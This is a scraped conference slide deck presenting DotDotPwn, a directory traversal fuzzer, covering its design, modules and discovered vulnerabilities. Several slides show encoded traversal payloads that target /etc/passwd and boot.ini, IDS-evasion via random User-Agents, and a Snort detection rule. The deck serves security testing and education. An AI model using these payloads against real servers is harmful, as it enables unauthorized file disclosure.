SlideShare a Scribd company logo

DotDotPwn v3.0 [GuadalajaraCON 2012]

Websec México, profile picture
Websec México

DotDotPwn is an intelligent fuzzer for discovering directory traversal vulnerabilities. It generates fuzz patterns according to the detected operating system and encodes slashes for correct semantics. It has modules for HTTP, FTP, TFTP and a PAYLOAD module. It is open source and has found vulnerabilities in over 100 software programs. The latest version is included in the Black Hat USA 2011 conference CD.

Technology
1 of 47
Downloaded 39 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
GuadalajaraCON 2012 ../../ DotDotPwn ! The Directory Traversal Fuzzer Alejandro Hernández H. (nitrØus), CISSP, GPEN Christian Navarrete (chr1x), GiJOE http://twitter.com/nitr0usmx http://twitter.com/chr1x <nitrousenador@gmail.com> <chr1x@sectester.net> http://chatsubo-labs.blogspot.com http://chr1x.sectester.net http://www.brainoverflow.org
../../ AGENDA DotDotPwn  Description Introduction  Directory Traversal Vulnerability  (Intelligent) Fuzz Testing General Information  Origin / Evolution  Design / Architecture  Usage options  Website / Contact  Download  Contributions Vulnerabilities  Discovered vulnerabilities Traversal Engine  Description  Resources  Fuzz patterns generation  Intelligent fuzzing Modules  Description of each one Greetings C
../../ DotDotPwn and Pentest Magazine #DoDotPWN @PentestMag C
../../ DotDotPwn and HackOS Proximamente en…. C
../../ DotDotPwn Description README.txt It’s a very flexible intelligent fuzzer to discover directory traversal vulnerabilities in software such as Web/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module. It's written in perl programming language and can be run either under *NIX or Windows platforms. It’s the first Mexican tool included in BackTrack Linux (BT4 R2). C
../../ Introduction Directory Traversal Vulnerability A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. The goal of this attack is to order an application to access a computer file that is not intended to be accessible. Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks. A typical example of vulnerable application in php code is: Source: http://en.wikipedia.org/wiki/Directory_traversal C
../../ Introduction Directory Traversal Vulnerability An attack against this system could be to send the following HTTP request: Generating a server response such as: Source: http://en.wikipedia.org/wiki/Directory_traversal C
../../ Introduction Directory Traversal Vulnerability Some web applications scan query string for dangerous characters (to prevent Directory Traversal vulnerabilities) such as: .. .. ../ However, the query string is usually URI decoded before use. Therefore these applications are vulnerable to percent encoded directory traversal such as: %2e%2e%2f which translates to ../ %2e%2e/ which translates to ../ ..%2f which translates to ../ %2e%2e%5c which translates to .. etc. Source: http://en.wikipedia.org/wiki/Directory_traversal C
../../ Introduction Directory Traversal Vulnerability According to a study done by Imperva about Web Applications Attacks, the Directory Traversal vulnerability is one of the most common attacks nowadays (July 2011) Source: Imperva’s Web Application Attack Report. Edition #1 - July 2011 C
../../ Introduction Fuzz Testing Fuzz testing or fuzzing is a software testing technique that provides (in)valid, unexpected, or random data to the inputs of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted. Fuzz testing enhances software security and software safety because it often finds odd oversights and defects which human testers would fail to find, and even careful human test designers would fail to create tests for. Source: http://en.wikipedia.org/wiki/Fuzz_testing C
../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
../../ General Information Origin / Evolution CHANGELOG.txt DotDotPwn v1.0 Release date: 21/Aug/2010  Checker Script  Core component: Traversal database (external .txt files) with 881 payloads  Based on Shlomi Narkolayev’s Directory Traversal Cheat Sheet  http://narkolayev-shlomi.blogspot.com/2010/04/directory-traversal-fuzz-list.html DotDotPwn v2.1 Release date: 29/Oct/2010 (BugCon Security Conferences 2010)  From Checker to Fuzzer  Rewritten from the scratch  Modular architechture (DotDotPwn packages)  Core component: Traversal Engine  OS detection (nmap)  A cool banner was included ;)  False positives detection  Many parameters included for fuzzing flexibility  More modules included DotDotPwn v3.0beta Release date: 03/Aug/2011 (Black Hat USA 2011 (Arsenal) - Conference CD)  Random User-Agent in HTTP requests  Operating System type specifier (if known)  Reporting capabilities C
../../ General Information Design / Architecture INPUTS FUZZ PATTERNS OUTPUTS CREATION Modules manual OS type HTTP Traversal Engine OS detection HTTP URL ../../ .... ..%2f..%2f Deepness FTP ..%255c..%255c ..%c0%2f..%c0%2f ..%u2215..%u2215 TFTP ..%uF025..%uF025 ..%25c1%259c..%25c1%259c Filenames %252e%252e%c0%5c%252e%252e%c0%5c PAYLOAD STDOUT Dots & Slashes Encodings C
../../ General Information Usage options USAGE.txt N
../../ General Information Usage options EXAMPLES.txt (one example per module) C
../../ General Information Website / Contact README.txt Official Website: http://dotdotpwn.sectester.net Official Email: dotdotpwn@sectester.net Bugs / Contributions / Improvements: dotdotpwn@sectester.net C
../../ General Information Download DotDotPwn v3.0beta: INCLUDED IN BLACK HAT USA 2011 CONFERENCE CD DotDotPwn v2.1: PacketStormSecurity: http://packetstormsecurity.org/files/view/95399/dotdotpwn-v2.1.tar.gz BackTrack Linux 4 R2: # apt-get update # apt-get install dotdotpwn # cd /pentest/fuzzers/dotdotpwn/ # ./dotdotpwn.pl Mirror: http://www.brainoverflow.org/code/dotdotpwn-v2.1.tar.gz N
../../ General Information Contributions AUTHORS.txt Contribution: Idea Implementation of the Bisection Algorithm (http://en.wikipedia.org/wiki/Bisection_method) once a vulnerability has been found in order to determine the exact deepness of the directory traversal. Origin of -X switch. By: Roberto Salgado aka LightOS http://twitter.com/LightOS http://www.websec.ca ------------------------------------- Contribution: Idea and Code Not always include the @Extra_files (e.g. web.config, httpd.conf, etc.). Origin of the -e switch. Specify the Operating System type if known ("windows" or "unix"). Origin of the -o switch. By: Eduardo Ruiz Duarte aka Beck http://twitter.com/toorandom http://math.co.ro http://b3ck.blogspot.com ------------------------------------- Contribution: Code Save a results' report into the Reports folder. Origin of the -r switch. Treatment of SIGINT in order to print the number of traversals found when Ctrl + C is pressed. Random User-Agent in HTTP requests for IDS/IPS detection avoidance. By: Diego Boy http://twitter.com/Diego_Boy ------------------------------------- Contribution: Code Random User-Agent in HTTP requests for IDS/IPS detection avoidance. By: Cristian Urrutia aka Gashnark http://twitter.com/blion_tec N
../../ General Information To Do  Implementation of the Bisection Algorithm to determine the exact deepness of the directory traversal. The bisection method in mathematics, is a root-finding method which repeatedly bisects an interval then selects a subinterval in which a root must lie for further processing. Source: http://en.wikipedia.org/wiki/Bisection_method ../../../../../../../../../../../../../../../../etc/passwd (16) ../../../../../../../../etc/passwd (16/2 = 8) ../../../../../../../../../../../../etc/passwd ((8+16) / 2 = 12) ../../../../../../../../../../etc/passwd ((8+12) / 2 = 10) ../../../../../../../../../../../etc/passwd ((10+12) / 2 = 11) 5 requests instead of 11 ! N
../../ Vulnerabilities Discovered vulnerabilities Tested software  HTTP: 72  Web platforms: 2 (CMS’s)  FTP: 25  TFTP: 11 C
../../ Vulnerabilities Discovered vulnerabilities Examples of findings … C
../../ Vulnerabilities Discovered vulnerabilities Exploits  MultiThreaded HTTP Server [chr1x] – http://www.exploit-db.com/exploits/12304  Wing FTP Server v3.4.3 [chr1x] - http://packetstormsecurity.org/1005-exploits/wingftp-traversal.txt  VicFTPS v5.0 [chr1x] – http://www.exploit-db.com/exploits/12498  TFTP Desktop 2.5 [chr1x] - http://www.exploit-db.com/exploits/14857  TFTPDWIN v0.4.2 [chr1x] - http://www.exploit-db.com/exploits/14856  Femitter FTP Server 1.04 [chr1x] - http://www.exploit-db.com/exploits/15445  Home FTP Server <= r1.11.1 (build 149) [chr1x] - http://www.exploit-db.com/exploits/15349  Yaws 1.89 HTTP Server [nitrØus] - http://www.exploit-db.com/exploits/15371  Mongoose 2.11 HTTP Server (Win32) [nitrØus] - http://www.exploit-db.com/exploits/15373 N
../../ Vulnerabilities Discovered vulnerabilities 3.4.5 – 2nd Traversal found ! 3.4.3 DotDotPwn iz Breaking Patches! 3.4.2  3.4.1 3.4.0 - 1st Traversal found ! ================= 56 days of exposure!! C
../../ Traversal Engine Description Traversal Engine ../../ .... ..%2f..%2f ..%255c..%255c ..%c0%2f..%c0%2f ..%u2215..%u2215 ..%uF025..%uF025 ..%25c1%259c..%25c1%259c %252e%252e%c0%5c%252e%252e%c0%5c N
../../ Traversal Engine Resources C
../../ Traversal Engine Resources N
../../ Traversal Engine Fuzz patterns generation N
../../ Traversal Engine Intelligent Fuzzing At the beggining of this presentation … Then … N
../../ Traversal Engine Intelligent Fuzzing  Fuzz patterns according to the Operating System detected (nmap) ../../../boot.ini on *NIX-like ../../../boot.ini on Windows ../../../etc/passwd on Windows ../../../etc/passwd on *NIX-like N
../../ Traversal Engine Intelligent Fuzzing N
../../ Traversal Engine Intelligent Fuzzing  Encoding of slashes (/) for the correct semantics in the fuzzing patterns ..%2f..%2fetc/passwd ..%2f..%2fetc%2fpasswd %2e%2e%c0%af%2e%2e%c0%afwindowssystem32driversetchosts %2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers %c0%afetc%c0%afhosts N
../../ Traversal Engine Intelligent Fuzzing N
../../ Modules HTTP #DotDowPwn #snort-2.8.4 - snort-2.9.x, and suricata alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN DotDotPwn User-Agent"; flow: established,to_server; content:"User-Agent|3A| DotDotPwn"; nocase; http_header; threshold: type limit, track by_src,count 1, seconds 60; classtype: attempted-recon; reference:url,dotdotpwn.sectester.net; sid:yyyyyy; rev:1;) C
../../ Modules HTTP  Additional verification to avoid false positives N
../../ Modules HTTP URL N
../../ Modules FTP N
../../ Modules FTP  Compliance with RFC 959 - File Transfer Protocol  Double testing approach:  CD <directory> & GET <file>  GET <directory><file> N
../../ Modules TFTP N
../../ Modules TFTP  A little hack in the TFTP.pm module’s constructor to improve the testing speed (-t switch in DotDotPwn) N
../../ Modules PAYLOAD N
../../ Modules STDOUT N
../../ Upcoming release… DotDotPwn v4.0 …Stay tuned.
../../ Greetings  r1l0, b0rr3x, l1l1th, chipx0r, preth00nker, NataS, Darko, beck, Daemon, dex, Alination, Carlos Ayala, hkm, calderpwn, tr3w, hecky, raito, BelindoFan etc etc…  Helga alt3kx :**  Contributors  GuadalajaraCON Crew  www.underground.org.mx  #mendozaaaa  CRAc, hkm, alt3kx, tr3w, beck, cldrn, LightOS, xScPx, Daemon, SirDarckCat, Rolman, Crypkey, KBrown, nediam, beavis, kaz, Carlos A. Ayala, corelanc0d3r, Héctor López, Raaka (el_gaupo), dex, Cj, preth00nker, Humberto Ochoa, ch0ks, ran, Federico L. Bossi Bonin, Bucio, javi3r, sunLevy, Zeus, etc… C/N
../../ Funny time!
../../ Thanks ! chr1x & nitrØus @ Solar Vision 3 Alejandro Hernández H. (nitrØus), CISSP, GPEN Christian Navarrete (chr1x), ), GiJOE http://twitter.com/nitr0usmx http://twitter.com/chr1x <nitrousenador@gmail.com> <chr1x@sectester.net> http://chatsubo-labs.blogspot.com http://chr1x.sectester.net http://www.brainoverflow.org

More Related Content

PDF
Guadalajara con 2012
Jaime Restrepo
 
ODP
Call Graph Agnostic Malware Indexing (EuskalHack 2017)
Joxean Koret
 
PPTX
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
Wayne Huang
 
PDF
Breaking av software
Thomas Pollet
 
PDF
Malware Analysis on a Shoestring Budget
Michael Boman
 
PDF
Tools for developers to ensure legal integrity of their code - Antelink OWF
Antelink
 
PPTX
Malware 101 by saurabh chaudhary
Saurav Chaudhary
 
ODP
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
Joxean Koret
 
Guadalajara con 2012
Jaime Restrepo
 
Call Graph Agnostic Malware Indexing (EuskalHack 2017)
Joxean Koret
 
0box Analyzer--Afterdark Runtime Forensics for Automated Malware Analysis and...
Wayne Huang
 
Breaking av software
Thomas Pollet
 
Malware Analysis on a Shoestring Budget
Michael Boman
 
Tools for developers to ensure legal integrity of their code - Antelink OWF
Antelink
 
Malware 101 by saurabh chaudhary
Saurav Chaudhary
 
The Nightmare Fuzzing Suite and Blind Code Coverage Fuzzer
Joxean Koret
 

What's hot (20)

PDF
Model-checking for efficient malware detection
Pôle Systematic Paris-Region
 
PDF
Community SUmmit: Legal & Licensing / Tools for developers to ensure legal in...
Paris Open Source Summit
 
PPT
Simple Bugs and Vulnerabilities in Linux Distributions
Silvio Cesare
 
PDF
Software Security - Static Analysis Tools
Emanuela Boroș
 
PPTX
How to drive a malware analyst crazy
Michael Boman
 
PDF
How to reverse engineer Android applications
hubx
 
PDF
MODERN MALWARE: OBFUSCATION AND EMULATION DEF CON CHINA 1.0 (2019)
Alexandre Borges
 
PDF
SherLog: Error Diagnosis by Connecting Clues from Run-time Logs
Dacong (Tony) Yan
 
PDF
WAF protections and bypass resources
Antonio Costa aka Cooler_
 
PDF
0d1n
Antonio Costa aka Cooler_
 
PDF
Android reverse engineering - Analyzing skype
Mário Almeida
 
PPT
Fuzzing 101 Webinar on Zero Day Management
Codenomicon
 
PDF
Searching for Multi-Fault Programs in Defects4J
Gabin An
 
PDF
Atmosphere 2014: JUnit: beyond the basics - Adam Dudczak
PROIDEA
 
PPTX
Fuzzing
Khalegh Salehi
 
PDF
Ceh v8 labs module 04 enumeration
Asep Sopyan
 
PDF
How to find_vulnerability_in_software
sanghwan ahn
 
PDF
Ceh v8 labs module 11 session hijacking
Asep Sopyan
 
PDF
MSL2009. Valgrind
Juan A. Suárez Romero
 
PPT
Reverse Engineering Android Application
n|u - The Open Security Community
 
Model-checking for efficient malware detection
Pôle Systematic Paris-Region
 
Community SUmmit: Legal & Licensing / Tools for developers to ensure legal in...
Paris Open Source Summit
 
Simple Bugs and Vulnerabilities in Linux Distributions
Silvio Cesare
 
Software Security - Static Analysis Tools
Emanuela Boroș
 
How to drive a malware analyst crazy
Michael Boman
 
How to reverse engineer Android applications
hubx
 
MODERN MALWARE: OBFUSCATION AND EMULATION DEF CON CHINA 1.0 (2019)
Alexandre Borges
 
SherLog: Error Diagnosis by Connecting Clues from Run-time Logs
Dacong (Tony) Yan
 
WAF protections and bypass resources
Antonio Costa aka Cooler_
 
0d1n
Antonio Costa aka Cooler_
 
Android reverse engineering - Analyzing skype
Mário Almeida
 
Fuzzing 101 Webinar on Zero Day Management
Codenomicon
 
Searching for Multi-Fault Programs in Defects4J
Gabin An
 
Atmosphere 2014: JUnit: beyond the basics - Adam Dudczak
PROIDEA
 
Fuzzing
Khalegh Salehi
 
Ceh v8 labs module 04 enumeration
Asep Sopyan
 
How to find_vulnerability_in_software
sanghwan ahn
 
Ceh v8 labs module 11 session hijacking
Asep Sopyan
 
MSL2009. Valgrind
Juan A. Suárez Romero
 
Reverse Engineering Android Application
n|u - The Open Security Community
 
Ad

Viewers also liked (8)

PDF
Hide and Find Rootkits in Linux [GuadalajaraCON 2012]
Websec México
 
PDF
Criptografía Experimental [GuadalajaraCON 2012]
Websec México
 
PDF
Rompiendo llaves RSA explícitamente con OpenSSL [GuadalajaraCON 2012]
Websec México
 
PDF
Escaneo de puertos distribuido [GuadalajaraCON 2012]
Websec México
 
PDF
Laboratorio de Análisis de Malware [GuadalajaraCON 2012]
Websec México
 
PDF
Criptografía vs esteganografía [GuadalajaraCON 2012]
Websec México
 
PDF
Detectando intrusiones en la red [GuadalajaraCON 2012]
Websec México
 
PDF
Cazando Predadores en Internet [GuadalajaraCON 2012]
Websec México
 
Hide and Find Rootkits in Linux [GuadalajaraCON 2012]
Websec México
 
Criptografía Experimental [GuadalajaraCON 2012]
Websec México
 
Rompiendo llaves RSA explícitamente con OpenSSL [GuadalajaraCON 2012]
Websec México
 
Escaneo de puertos distribuido [GuadalajaraCON 2012]
Websec México
 
Laboratorio de Análisis de Malware [GuadalajaraCON 2012]
Websec México
 
Criptografía vs esteganografía [GuadalajaraCON 2012]
Websec México
 
Detectando intrusiones en la red [GuadalajaraCON 2012]
Websec México
 
Cazando Predadores en Internet [GuadalajaraCON 2012]
Websec México
 
Ad

Similar to DotDotPwn v3.0 [GuadalajaraCON 2012] (20)

PDF
DotDotPwn Fuzzer - Black Hat 2011 (Arsenal)
Alejandro Hernández
 
PDF
SOHOpelessly Broken
The Security of Things Forum
 
PPTX
Introduction to path traversal attack
Prashant Hegde
 
PDF
Wfuzz para Penetration Testers
Source Conference
 
PDF
The Web Application Hackers Toolchain
jasonhaddix
 
PDF
Hack Attack! An Introduction to Penetration Testing
Steve Phillips
 
PDF
Fuzzing sucks!
Yury Chemerkin
 
PDF
Oss forensics fosscomm_2011
fangjiafu
 
PDF
ScaleCamp 2009 - Last.fm vs Xbox
davidsingleton
 
PPTX
Hunting Botnets with Zmap
HeadlessZeke
 
PDF
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
SegInfo
 
PDF
Lares from LOW to PWNED
Chris Gates
 
PDF
Hacking school computers for fun profit and better grades short
Vincent Ohprecio
 
PDF
Intro2 malwareanalysisshort
Vincent Ohprecio
 
PPTX
How to dominate a country
Tiago Henriques
 
PDF
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
 
PDF
Intrusion Techniques
Festival Software Livre
 
PPTX
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
PDF
Penetration Testing Services Technical Description Cyber51
martinvoelk
 
PDF
4.1. Path traversal post_exploitation
defconmoscow
 
DotDotPwn Fuzzer - Black Hat 2011 (Arsenal)
Alejandro Hernández
 
SOHOpelessly Broken
The Security of Things Forum
 
Introduction to path traversal attack
Prashant Hegde
 
Wfuzz para Penetration Testers
Source Conference
 
The Web Application Hackers Toolchain
jasonhaddix
 
Hack Attack! An Introduction to Penetration Testing
Steve Phillips
 
Fuzzing sucks!
Yury Chemerkin
 
Oss forensics fosscomm_2011
fangjiafu
 
ScaleCamp 2009 - Last.fm vs Xbox
davidsingleton
 
Hunting Botnets with Zmap
HeadlessZeke
 
"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por
SegInfo
 
Lares from LOW to PWNED
Chris Gates
 
Hacking school computers for fun profit and better grades short
Vincent Ohprecio
 
Intro2 malwareanalysisshort
Vincent Ohprecio
 
How to dominate a country
Tiago Henriques
 
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
 
Intrusion Techniques
Festival Software Livre
 
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
Penetration Testing Services Technical Description Cyber51
martinvoelk
 
4.1. Path traversal post_exploitation
defconmoscow
 

More from Websec México (20)

PDF
PwnedCon - Programación segura [Mariano Marino]
Websec México
 
PDF
PwnedCon - RaceConditions [Mariano Marino]
Websec México
 
PDF
PwnedCon - Taller: FlipperZero 101 [Mariano Marino]
Websec México
 
PPTX
Ciberseguridad durante la pandemia [Paulino Calderon]
Websec México
 
PPTX
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
Websec México
 
PDF
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Websec México
 
PPTX
Derrotando a changos con scanners [Paulino Calderon]
Websec México
 
PPTX
Old fox new tricks malicious macros are back
Websec México
 
PDF
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Websec México
 
PDF
Mi experiencia en el programa Google Summer of Code
Websec México
 
PDF
Escribiendo firmas para el sistema de detección de versiones de Nmap
Websec México
 
PDF
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
Websec México
 
PPTX
Pwning corporate networks in a single day by Paulino Calderon Pale
Websec México
 
PPTX
CPMX7 Pwneando redes informáticas por Paulino Calderon
Websec México
 
PPTX
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Websec México
 
PPTX
Explotación práctica de señales de radio por Luis Colunga
Websec México
 
PDF
Pentesting 101 por Paulino Calderon
Websec México
 
PDF
Obtener contraseñas del directorio activo por hkm
Websec México
 
PDF
OSINT vs CIBERCRIMEN por nickops
Websec México
 
PPTX
Recuperacion de defaces con versionador Git por Alevsk
Websec México
 
PwnedCon - Programación segura [Mariano Marino]
Websec México
 
PwnedCon - RaceConditions [Mariano Marino]
Websec México
 
PwnedCon - Taller: FlipperZero 101 [Mariano Marino]
Websec México
 
Ciberseguridad durante la pandemia [Paulino Calderon]
Websec México
 
OWASP IoTGoat - Enseñando a desarrolladores IoT a crear productos seguros - P...
Websec México
 
Estadisticas de redes 802.11 en Mexico (2013) por Paulino Calderon
Websec México
 
Derrotando a changos con scanners [Paulino Calderon]
Websec México
 
Old fox new tricks malicious macros are back
Websec México
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Websec México
 
Mi experiencia en el programa Google Summer of Code
Websec México
 
Escribiendo firmas para el sistema de detección de versiones de Nmap
Websec México
 
El porqué está fallando tu programa de seguridad informática por Paulino Cald...
Websec México
 
Pwning corporate networks in a single day by Paulino Calderon Pale
Websec México
 
CPMX7 Pwneando redes informáticas por Paulino Calderon
Websec México
 
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Websec México
 
Explotación práctica de señales de radio por Luis Colunga
Websec México
 
Pentesting 101 por Paulino Calderon
Websec México
 
Obtener contraseñas del directorio activo por hkm
Websec México
 
OSINT vs CIBERCRIMEN por nickops
Websec México
 
Recuperacion de defaces con versionador Git por Alevsk
Websec México
 

Recently uploaded (20)

PDF
August Patch Tuesday
Ivanti
 
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
PDF
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
PDF
Getting started with AI Agents and Multi-Agent Systems
Maxim Salnikov
 
PPTX
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
PDF
project resource management chapter-09.pdf
ssuser00e6e21
 
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PDF
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
How ambidextrous entrepreneurial leaders react to the artificial intelligence...
IAESIJAI
 
PPTX
Final SEM Unit 1 for mit wpu at pune .pptx
anishtilekar08
 
PPTX
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
SilvioHayashi
 
PDF
2021 HotChips TSMC Packaging Technologies for Chiplets and 3D_0819 publish_pu...
KeXue5
 
PPT
Module 1.ppt Iot fundamentals and Architecture
nanditha7766
 
PDF
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
PPTX
TLE Review Electricity (Electricity).pptx
JayPolicarpio2
 
PPTX
cloud_computing_Infrastucture_as_cloud_p
mainakbhattacharya20
 
PDF
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
PPT
What is a Computer? Input Devices /output devices
GulJan8
 
PDF
STKI Israel Market Study 2025 version august
Dr. Jimmy Schwarzkopf
 
August Patch Tuesday
Ivanti
 
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
Web App vs Mobile App What Should You Build First.pdf
KodekX
 
Getting started with AI Agents and Multi-Agent Systems
Maxim Salnikov
 
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
project resource management chapter-09.pdf
ssuser00e6e21
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
Univ-Connecticut-ChatGPT-Presentaion.pdf
ry7r52mzb4
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
How ambidextrous entrepreneurial leaders react to the artificial intelligence...
IAESIJAI
 
Final SEM Unit 1 for mit wpu at pune .pptx
anishtilekar08
 
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
SilvioHayashi
 
2021 HotChips TSMC Packaging Technologies for Chiplets and 3D_0819 publish_pu...
KeXue5
 
Module 1.ppt Iot fundamentals and Architecture
nanditha7766
 
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
TLE Review Electricity (Electricity).pptx
JayPolicarpio2
 
cloud_computing_Infrastucture_as_cloud_p
mainakbhattacharya20
 
A novel scalable deep ensemble learning framework for big data classification...
IAESIJAI
 
What is a Computer? Input Devices /output devices
GulJan8
 
STKI Israel Market Study 2025 version august
Dr. Jimmy Schwarzkopf
 

DotDotPwn v3.0 [GuadalajaraCON 2012]

  • 1. GuadalajaraCON 2012 ../../ DotDotPwn ! The Directory Traversal Fuzzer Alejandro Hernández H. (nitrØus), CISSP, GPEN Christian Navarrete (chr1x), GiJOE http://twitter.com/nitr0usmx http://twitter.com/chr1x <nitrousenador@gmail.com> <chr1x@sectester.net> http://chatsubo-labs.blogspot.com http://chr1x.sectester.net http://www.brainoverflow.org
  • 2. ../../ AGENDA DotDotPwn  Description Introduction  Directory Traversal Vulnerability  (Intelligent) Fuzz Testing General Information  Origin / Evolution  Design / Architecture  Usage options  Website / Contact  Download  Contributions Vulnerabilities  Discovered vulnerabilities Traversal Engine  Description  Resources  Fuzz patterns generation  Intelligent fuzzing Modules  Description of each one Greetings C
  • 3. ../../ DotDotPwn and Pentest Magazine #DoDotPWN @PentestMag C
  • 4. ../../ DotDotPwn and HackOS Proximamente en…. C
  • 5. ../../ DotDotPwn Description README.txt It’s a very flexible intelligent fuzzer to discover directory traversal vulnerabilities in software such as Web/FTP/TFTP servers, Web platforms such as CMSs, ERPs, Blogs, etc. Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it also could be used in a scripting way using the STDOUT module. It's written in perl programming language and can be run either under *NIX or Windows platforms. It’s the first Mexican tool included in BackTrack Linux (BT4 R2). C
  • 6. ../../ Introduction Directory Traversal Vulnerability A directory traversal (or path traversal) consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. The goal of this attack is to order an application to access a computer file that is not intended to be accessible. Directory traversal is also known as the ../ (dot dot slash) attack, directory climbing, and backtracking. Some forms of this attack are also canonicalization attacks. A typical example of vulnerable application in php code is: Source: http://en.wikipedia.org/wiki/Directory_traversal C
  • 7. ../../ Introduction Directory Traversal Vulnerability An attack against this system could be to send the following HTTP request: Generating a server response such as: Source: http://en.wikipedia.org/wiki/Directory_traversal C
  • 8. ../../ Introduction Directory Traversal Vulnerability Some web applications scan query string for dangerous characters (to prevent Directory Traversal vulnerabilities) such as: .. .. ../ However, the query string is usually URI decoded before use. Therefore these applications are vulnerable to percent encoded directory traversal such as: %2e%2e%2f which translates to ../ %2e%2e/ which translates to ../ ..%2f which translates to ../ %2e%2e%5c which translates to .. etc. Source: http://en.wikipedia.org/wiki/Directory_traversal C
  • 9. ../../ Introduction Directory Traversal Vulnerability According to a study done by Imperva about Web Applications Attacks, the Directory Traversal vulnerability is one of the most common attacks nowadays (July 2011) Source: Imperva’s Web Application Attack Report. Edition #1 - July 2011 C
  • 10. ../../ Introduction Fuzz Testing Fuzz testing or fuzzing is a software testing technique that provides (in)valid, unexpected, or random data to the inputs of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted. Fuzz testing enhances software security and software safety because it often finds odd oversights and defects which human testers would fail to find, and even careful human test designers would fail to create tests for. Source: http://en.wikipedia.org/wiki/Fuzz_testing C
  • 11. ../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
  • 12. ../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
  • 13. ../../ Introduction Intelligent Fuzz Testing Source: N DeMott, J. (2006). The evolving art of fuzzing.
  • 14. ../../ General Information Origin / Evolution CHANGELOG.txt DotDotPwn v1.0 Release date: 21/Aug/2010  Checker Script  Core component: Traversal database (external .txt files) with 881 payloads  Based on Shlomi Narkolayev’s Directory Traversal Cheat Sheet  http://narkolayev-shlomi.blogspot.com/2010/04/directory-traversal-fuzz-list.html DotDotPwn v2.1 Release date: 29/Oct/2010 (BugCon Security Conferences 2010)  From Checker to Fuzzer  Rewritten from the scratch  Modular architechture (DotDotPwn packages)  Core component: Traversal Engine  OS detection (nmap)  A cool banner was included ;)  False positives detection  Many parameters included for fuzzing flexibility  More modules included DotDotPwn v3.0beta Release date: 03/Aug/2011 (Black Hat USA 2011 (Arsenal) - Conference CD)  Random User-Agent in HTTP requests  Operating System type specifier (if known)  Reporting capabilities C
